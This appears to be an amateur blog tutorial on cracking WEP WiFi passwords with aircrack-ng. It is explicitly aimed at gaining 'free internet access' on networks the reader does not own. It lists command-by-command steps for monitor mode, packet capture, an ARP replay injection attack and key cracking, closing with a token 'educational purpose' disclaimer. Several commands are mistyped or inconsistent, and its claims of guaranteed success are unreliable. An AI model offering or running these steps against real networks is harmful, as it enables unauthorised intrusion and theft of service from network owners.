WiFi hacking is not easy as people think and it cannot done through some softwares placed on play store or find everywhere over internet. wifi hacking can be done only through proffesional softwares or linux os. so anyone who want to crack or hack wifi password must use linux os to hack password for free. this is the only best way to hack password without getting hacked, because many software has placed a backdoor/trojan virus in it so it'll hack your own computer not wifi password. so check the software first and then try to use the software. so i see alot of people in my facebook id are asking me to how to hack a wifi password. so i think alot and then sharing this article to you. it'll definatly work and you'll get the wifi password and will enjoy free internet access. so let start the tutorial.
First we have to install air-crack program in o.s
1. install aircrack
sudo apt-get install aircrack-ng
2. You need to go in root first. For this purpose type “su –“ and type your password.
(3) Now Type Following Command In Terminal Code:
# iwconfig wlan0 mode monitoring
Note: If some sort of error occurs type “# iwconfig” in a terminal to check for your wireless.
4. After that it’s time to scan for a wireless network which we will compromise with educational purpose. This time we will use the command:
# airodump-ng wlan0
5. Once you’ve found one, abort the process with Ctrl+C. Now when we have got our target it’s time to collect some information about the network. First of all copy the MAC Address of the access point which stands for BSSID (should look something like 00:15:EB:E7: …). Another thing is that we need to know the channel it’s currently working on (could see that under CH – e.g. 6). So let’s gather our information with airodump-ng.
# airodump-ng –w wep –c 6 –bssid 00:15:EB:E7: … wlan0
6. Now we need to open another terminal in which we will use ARP Reply attack to increase the amount of data packets and gather the initializing vectors or IV of the earlier chosen Access Point.
# aireplay-ng -3 –b 00:15:EB:E7: … wlan0
7. Let’s go to terminal 1 again and have a look at the data packets. We need to have collected over 20 000 packets. If so abort both airodump-ng and aireplay-ng.
Now we have everything required to decode the key of the wireless network. We do that with aircrack as shown below:
# aircrack-ng wep-03.cap
Then you should see that the key has been decrypted 100% successfully and the key itself.
Note: Its For Educational Purpose Only.